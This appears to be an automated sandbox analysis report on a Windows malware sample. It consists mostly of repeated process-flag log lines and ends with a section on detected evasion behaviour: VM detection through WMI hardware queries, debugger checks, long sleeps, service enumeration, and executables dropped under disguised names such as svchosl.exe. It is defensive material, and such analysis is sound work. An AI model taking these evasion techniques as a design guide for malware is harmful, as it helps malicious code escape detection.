Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\takeown.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\takeown.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\takeown.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\takeown.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\file.exe Memory allocated: 44A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 4880000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 6880000 memory reserve | memory write watch Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C324C rdtsc 16_2_00007FF8A87C324C
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 0_2_004019F0
Contains functionality to enumerate running services
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Code function: OpenServiceW,GetServiceDisplayNameW,GetServiceKeyNameW,GetLastError,GetLastError,EnumServicesStatusExW,GetLastError,GetProcessHeap,HeapAlloc,EnumServicesStatusExW,GetLastError,GetProcessHeap,HeapFree,GetLastError,_snwprintf_s,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 6_2_000000014000EE50
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Code function: EnumServicesStatusExW,GetLastError,GetLastError,GetProcessHeap,HeapAlloc,EnumServicesStatusExW,GetLastError,_snwprintf_s,GetProcessHeap,HeapFree,GetLastError,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 6_2_0000000140011A80
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7682
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2034
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8138
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1506
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1252
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 474
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8564
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1173
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6441
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3307
Found dropped PE file which has not been started or loaded
Source: C:\Users\mig.exe Dropped PE file which has not been started: C:\ProgramData\migrate.exe Jump to dropped file
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Dropped PE file which has not been started: C:\Windows\Temp\_MEI65122\_bz2.pyd Jump to dropped file
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Dropped PE file which has not been started: C:\Windows\Temp\_MEI65122\_ctypes.pyd Jump to dropped file
